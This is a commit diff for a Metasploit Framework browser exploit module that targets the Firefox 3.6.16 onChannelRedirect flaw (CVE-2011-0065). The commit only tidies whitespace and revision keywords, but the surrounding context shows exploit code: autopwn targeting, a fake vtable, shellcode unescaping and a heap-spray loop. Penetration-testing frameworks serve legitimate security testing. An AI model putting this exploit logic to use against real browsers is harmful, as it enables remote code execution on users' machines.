Whitespace and keyword cleanup

unstable
sinn3r 2012-01-16 19:55:27 -06:00
parent 5d359785ae
commit 618097ba3d
1 changed files with 5 additions and 10 deletions

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -16,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::FF,
:ua_minver => "3.6.16",
@ -43,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Rh0', # windows metasploit module
'argp <argp[at]census-labs.com>' # mac os x target
],
'Version' => "$Revision$",
'References' =>
[
['CVE', '2011-0065'],
@ -69,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 10 2011'
))
))
end
def on_request_uri(cli, request)
@ -110,9 +106,9 @@ class Metasploit3 < Msf::Exploit::Remote
#{js_element_name}.onChannelRedirect(null, new Object, 0)
#{js_obj_addr_name} = unescape("\x00#{fakevtable}");
var #{js_sc_name} = unescape("#{escaped_payload}");
var #{js_ret_addr_name} = unescape("#{fakefunc}");
while(#{js_ret_addr_name}.length < 0x120)
@ -130,8 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote
#{js_final_chunk_name} += #{js_final_chunk_name};
}
var #{js_block_name} = #{js_final_chunk_name}.substring(0,
0x80000 - #{js_sc_name}.length - 0x24 / 2 - 0x4 / 2 - 0x2 / 2);
var #{js_block_name} = #{js_final_chunk_name}.substring(0, 0x80000 - #{js_sc_name}.length - 0x24 / 2 - 0x4 / 2 - 0x2 / 2);
#{js_array_name} = new Array()